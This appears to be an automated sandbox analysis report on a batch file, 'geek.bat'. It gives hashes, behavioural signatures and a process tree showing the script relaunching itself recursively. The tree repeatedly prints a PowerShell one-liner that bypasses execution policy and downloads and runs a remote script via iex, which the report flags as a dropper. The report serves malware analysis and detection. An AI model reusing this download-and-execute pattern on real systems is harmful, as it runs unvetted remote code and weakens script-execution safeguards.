4b9e4bbd675a45f1a99d54bff55576ba3c6d79ab76ea30e143d89fc1543e8580

Analysis

max time kernel
150s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 06:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Files/Apps/geek.bat
Size

1KB
MD5

0234fed5fac93a5888925331acabd441
SHA1

4af4ac61ccacfb361c39d86b7c7700476deca049
SHA256

9090767211e7b2b5c23304712fe55e3beeea78364a95088bab3554174fc51eee
SHA512

df148b1b048336731293ce6d2c5d0e7bb0dd0806254aa447d47e0216885a93f284c2aa93bddca67dd2b345f549837f8942b3f088092c58ffff238ae91b861636

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://community.chocolatey.org/install.ps1

Signatures

Blocklisted process makes network request 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
11	3892	powershell.exe
18	3892	powershell.exe
20	4216	powershell.exe
24	3220	powershell.exe
28	1932	powershell.exe
30	440	powershell.exe
31	3108	powershell.exe
32	4640	powershell.exe
33	3168	powershell.exe
38	4556	powershell.exe
45	440	powershell.exe
49	3684	powershell.exe
50	3268	powershell.exe
51	4264	powershell.exe
52	4892	powershell.exe
53	1280	powershell.exe
54	5076	powershell.exe
55	1528	powershell.exe
56	2140	powershell.exe
57	4792	powershell.exe
58	4880	powershell.exe
59	1520	powershell.exe
60	4236	powershell.exe
63	408	powershell.exe
64	1520	powershell.exe
65	3656	powershell.exe
66	2844	powershell.exe
67	812	powershell.exe
68	3872	powershell.exe
69	3164	powershell.exe
70	4784	powershell.exe
71	1528	powershell.exe
72	4892	powershell.exe
73	924	powershell.exe
74	1240	powershell.exe
75	2008	powershell.exe
76	4724	powershell.exe
77	1208	powershell.exe
82	2676	powershell.exe
85	1172	powershell.exe
86	4796	powershell.exe
87	2276	powershell.exe
88	3600	powershell.exe
89	2288	powershell.exe
90	1652	powershell.exe
91	1840	powershell.exe
92	4644	powershell.exe
93	4856	powershell.exe
94	4384	powershell.exe
95	3936	powershell.exe
96	724	powershell.exe
97	4540	powershell.exe
98	4784	powershell.exe
99	3392	powershell.exe
100	400	powershell.exe
101	2928	powershell.exe
102	1716	powershell.exe
103	2992	powershell.exe
104	1164	powershell.exe
105	3492	powershell.exe
106	4944	powershell.exe
107	3472	powershell.exe
108	2340	powershell.exe
109	2588	powershell.exe

Executes dropped EXE 1 IoCs

Processes:

choco.exe

pid process

4168 choco.exe

pid	process
4168	choco.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

pid	process
4792	powershell.exe
1828	powershell.exe
1584	powershell.exe
2712	powershell.exe
5016	powershell.exe
4892	powershell.exe
4784	powershell.exe
408	powershell.exe
4964	powershell.exe
1164	powershell.exe
4872	powershell.exe
2356	powershell.exe
1528	powershell.exe
4896	powershell.exe
4384	powershell.exe
4944	powershell.exe
2324	powershell.exe
2928	powershell.exe
872	powershell.exe
4556	powershell.exe
2844	powershell.exe
1396	powershell.exe
4784	powershell.exe
3140	powershell.exe
4540	powershell.exe
2212	powershell.exe
2276	powershell.exe
1224	powershell.exe
860	powershell.exe
2340	powershell.exe
1520	powershell.exe
408	powershell.exe
3168	powershell.exe
3684	powershell.exe
4528	powershell.exe
2008	powershell.exe
3348	powershell.exe
2928	powershell.exe
4264	powershell.exe
3936	powershell.exe
1476	powershell.exe
2992	powershell.exe
1116	powershell.exe
5012	powershell.exe
924	powershell.exe
5044	powershell.exe
440	powershell.exe
3036	powershell.exe
812	powershell.exe
1208	powershell.exe
3600	powershell.exe
3892	powershell.exe
1520	powershell.exe
1428	powershell.exe
1240	powershell.exe
1172	powershell.exe
3472	powershell.exe
1408	powershell.exe
2140	powershell.exe
2984	powershell.exe
3872	powershell.exe
4724	powershell.exe
2744	powershell.exe
5012	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pid	process
4528	powershell.exe
4528	powershell.exe
4528	powershell.exe
3892	powershell.exe
3892	powershell.exe
4416	powershell.exe
4416	powershell.exe
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
4216	powershell.exe
4216	powershell.exe
2676	powershell.exe
2676	powershell.exe
2928	powershell.exe
2928	powershell.exe
2928	powershell.exe
3220	powershell.exe
3220	powershell.exe
3580	powershell.exe
3580	powershell.exe
2340	powershell.exe
2340	powershell.exe
2340	powershell.exe
1932	powershell.exe
1932	powershell.exe
1384	powershell.exe
1384	powershell.exe
2728	powershell.exe
2728	powershell.exe
2728	powershell.exe
440	powershell.exe
440	powershell.exe
672	powershell.exe
672	powershell.exe
1476	powershell.exe
1476	powershell.exe
1476	powershell.exe
3108	powershell.exe
3108	powershell.exe
1052	powershell.exe
1052	powershell.exe
3016	powershell.exe
3016	powershell.exe
3016	powershell.exe
4640	powershell.exe
4640	powershell.exe
4432	powershell.exe
4432	powershell.exe
4200	powershell.exe
4200	powershell.exe
4200	powershell.exe
3168	powershell.exe
3168	powershell.exe
2992	powershell.exe
2992	powershell.exe
4872	powershell.exe
4872	powershell.exe
4872	powershell.exe
4556	powershell.exe
4556	powershell.exe
2316	powershell.exe
2316	powershell.exe
2276	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	4528	powershell.exe
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeBackupPrivilege	3892	powershell.exe
Token: SeBackupPrivilege	3892	powershell.exe
Token: SeRestorePrivilege	3892	powershell.exe
Token: SeSecurityPrivilege	3892	powershell.exe
Token: SeBackupPrivilege	3892	powershell.exe
Token: SeBackupPrivilege	3892	powershell.exe
Token: SeRestorePrivilege	3892	powershell.exe
Token: SeSecurityPrivilege	3892	powershell.exe
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeDebugPrivilege	4216	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	3220	powershell.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	2340	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeDebugPrivilege	2728	powershell.exe
Token: SeDebugPrivilege	440	powershell.exe
Token: SeDebugPrivilege	672	powershell.exe
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeDebugPrivilege	4432	powershell.exe
Token: SeDebugPrivilege	4200	powershell.exe
Token: SeDebugPrivilege	3168	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	4872	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	440	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeDebugPrivilege	3268	powershell.exe
Token: SeDebugPrivilege	1280	powershell.exe
Token: SeDebugPrivilege	1116	powershell.exe
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	744	powershell.exe
Token: SeDebugPrivilege	392	powershell.exe
Token: SeDebugPrivilege	1280	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeDebugPrivilege	4792	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exepowershell.exepowershell.execmd.execmd.exepowershell.execmd.execmd.exe

description	pid	process	target process
PID 4800 wrote to memory of 3928	4800	cmd.exe	fltMC.exe
PID 4800 wrote to memory of 3928	4800	cmd.exe	fltMC.exe
PID 4800 wrote to memory of 3624	4800	cmd.exe	cmd.exe
PID 4800 wrote to memory of 3624	4800	cmd.exe	cmd.exe
PID 4800 wrote to memory of 940	4800	cmd.exe	cmd.exe
PID 4800 wrote to memory of 940	4800	cmd.exe	cmd.exe
PID 940 wrote to memory of 2980	940	cmd.exe	chcp.com
PID 940 wrote to memory of 2980	940	cmd.exe	chcp.com
PID 4800 wrote to memory of 4656	4800	cmd.exe	chcp.com
PID 4800 wrote to memory of 4656	4800	cmd.exe	chcp.com
PID 4800 wrote to memory of 3260	4800	cmd.exe	chcp.com
PID 4800 wrote to memory of 3260	4800	cmd.exe	chcp.com
PID 4800 wrote to memory of 4528	4800	cmd.exe	powershell.exe
PID 4800 wrote to memory of 4528	4800	cmd.exe	powershell.exe
PID 4800 wrote to memory of 3892	4800	cmd.exe	powershell.exe
PID 4800 wrote to memory of 3892	4800	cmd.exe	powershell.exe
PID 3892 wrote to memory of 4804	3892	powershell.exe	setx.exe
PID 3892 wrote to memory of 4804	3892	powershell.exe	setx.exe
PID 3892 wrote to memory of 5012	3892	powershell.exe	setx.exe
PID 3892 wrote to memory of 5012	3892	powershell.exe	setx.exe
PID 3892 wrote to memory of 1276	3892	powershell.exe	setx.exe
PID 3892 wrote to memory of 1276	3892	powershell.exe	setx.exe
PID 3892 wrote to memory of 224	3892	powershell.exe	setx.exe
PID 3892 wrote to memory of 224	3892	powershell.exe	setx.exe
PID 3892 wrote to memory of 4168	3892	powershell.exe	choco.exe
PID 3892 wrote to memory of 4168	3892	powershell.exe	choco.exe
PID 3892 wrote to memory of 4168	3892	powershell.exe	choco.exe
PID 4800 wrote to memory of 4416	4800	cmd.exe	powershell.exe
PID 4800 wrote to memory of 4416	4800	cmd.exe	powershell.exe
PID 4416 wrote to memory of 4444	4416	powershell.exe	cmd.exe
PID 4416 wrote to memory of 4444	4416	powershell.exe	cmd.exe
PID 4444 wrote to memory of 1044	4444	cmd.exe	fltMC.exe
PID 4444 wrote to memory of 1044	4444	cmd.exe	fltMC.exe
PID 4444 wrote to memory of 2736	4444	cmd.exe	cmd.exe
PID 4444 wrote to memory of 2736	4444	cmd.exe	cmd.exe
PID 4444 wrote to memory of 4872	4444	cmd.exe	cmd.exe
PID 4444 wrote to memory of 4872	4444	cmd.exe	cmd.exe
PID 4872 wrote to memory of 4000	4872	cmd.exe	chcp.com
PID 4872 wrote to memory of 4000	4872	cmd.exe	chcp.com
PID 4444 wrote to memory of 2948	4444	cmd.exe	chcp.com
PID 4444 wrote to memory of 2948	4444	cmd.exe	chcp.com
PID 4444 wrote to memory of 2008	4444	cmd.exe	chcp.com
PID 4444 wrote to memory of 2008	4444	cmd.exe	chcp.com
PID 4444 wrote to memory of 3140	4444	cmd.exe	powershell.exe
PID 4444 wrote to memory of 3140	4444	cmd.exe	powershell.exe
PID 4444 wrote to memory of 4216	4444	cmd.exe	powershell.exe
PID 4444 wrote to memory of 4216	4444	cmd.exe	powershell.exe
PID 4444 wrote to memory of 2676	4444	cmd.exe	powershell.exe
PID 4444 wrote to memory of 2676	4444	cmd.exe	powershell.exe
PID 2676 wrote to memory of 1120	2676	powershell.exe	cmd.exe
PID 2676 wrote to memory of 1120	2676	powershell.exe	cmd.exe
PID 1120 wrote to memory of 4076	1120	cmd.exe	fltMC.exe
PID 1120 wrote to memory of 4076	1120	cmd.exe	fltMC.exe
PID 1120 wrote to memory of 3032	1120	cmd.exe	cmd.exe
PID 1120 wrote to memory of 3032	1120	cmd.exe	cmd.exe
PID 1120 wrote to memory of 3268	1120	cmd.exe	cmd.exe
PID 1120 wrote to memory of 3268	1120	cmd.exe	cmd.exe
PID 3268 wrote to memory of 1408	3268	cmd.exe	chcp.com
PID 3268 wrote to memory of 1408	3268	cmd.exe	chcp.com
PID 1120 wrote to memory of 1016	1120	cmd.exe	chcp.com
PID 1120 wrote to memory of 1016	1120	cmd.exe	chcp.com
PID 1120 wrote to memory of 2588	1120	cmd.exe	chcp.com
PID 1120 wrote to memory of 2588	1120	cmd.exe	chcp.com
PID 1120 wrote to memory of 2928	1120	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4800
- C:\Windows\system32\fltMC.exe
  fltmc
  2⤵
  PID:3928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ver
  2⤵
  PID:3624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c chcp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:940
- - C:\Windows\system32\chcp.com
    chcp
    3⤵
    PID:2980
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:4656
- C:\Windows\system32\chcp.com
  chcp 437
  2⤵
  PID:3260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-ExecutionPolicy AllSigned
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3892
- - C:\Windows\System32\setx.exe
    "C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate 133765573371522551
    3⤵
    PID:4804
- - C:\Windows\System32\setx.exe
    "C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate 133765573372147576
    3⤵
    PID:5012
- - C:\Windows\System32\setx.exe
    "C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate 133765573372772393
    3⤵
    PID:1276
- - C:\Windows\System32\setx.exe
    "C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate 133765573377147306
    3⤵
    PID:224
- - C:\ProgramData\chocolatey\choco.exe
    "C:\ProgramData\chocolatey\choco.exe" -v
    3⤵
    - Executes dropped EXE
    PID:4168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4444
  - - C:\Windows\system32\fltMC.exe
      fltmc
      4⤵
      PID:1044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ver
      4⤵
      PID:2736
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c chcp
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4872
    - - C:\Windows\system32\chcp.com
        
        chcp
        5⤵
        
        PID:4000
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:2948
  - - C:\Windows\system32\chcp.com
      chcp 437
      4⤵
      PID:2008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-ExecutionPolicy AllSigned
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3140
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4216
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2676
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1120
      - C:\Windows\system32\fltMC.exe
        
        fltmc
        6⤵
        
        PID:4076
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        6⤵
        
        PID:3032
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3268
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:1408
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:1016
      - C:\Windows\system32\chcp.com
        
        chcp 437
        6⤵
        
        PID:2588
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2928
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3220
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        7⤵
        
        PID:4304
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        8⤵
        
        PID:4856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        8⤵
        
        PID:3604
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        8⤵
        
        PID:232
        
        C:\Windows\system32\chcp.com
        
        chcp
        9⤵
        
        PID:1224
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2136
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        8⤵
        
        PID:3064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        9⤵
        
        PID:2716
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        10⤵
        
        PID:1548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        10⤵
        
        PID:5004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        10⤵
        
        PID:5016
        
        C:\Windows\system32\chcp.com
        
        chcp
        11⤵
        
        PID:872
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:3724
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        10⤵
        
        PID:3532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        10⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        11⤵
        
        PID:3464
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        12⤵
        
        PID:4976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        12⤵
        
        PID:4844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        12⤵
        
        PID:3232
        
        C:\Windows\system32\chcp.com
        
        chcp
        13⤵
        
        PID:4484
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:4812
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        12⤵
        
        PID:3096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        12⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        12⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        13⤵
        
        PID:1444
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        14⤵
        
        PID:3256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        14⤵
        
        PID:2356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        14⤵
        
        PID:4528
        
        C:\Windows\system32\chcp.com
        
        chcp
        15⤵
        
        PID:1600
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:4588
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        14⤵
        
        PID:1832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        14⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        14⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        14⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        15⤵
        
        PID:1660
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        16⤵
        
        PID:3536
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        16⤵
        
        PID:3916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        16⤵
        
        PID:2724
        
        C:\Windows\system32\chcp.com
        
        chcp
        17⤵
        
        PID:2928
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:5036
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        16⤵
        
        PID:2412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        16⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        16⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        16⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        17⤵
        
        PID:744
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        18⤵
        
        PID:2700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        18⤵
        
        PID:1416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        18⤵
        
        PID:3684
        
        C:\Windows\system32\chcp.com
        
        chcp
        19⤵
        
        PID:2948
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:3008
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        18⤵
        
        PID:4000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        18⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
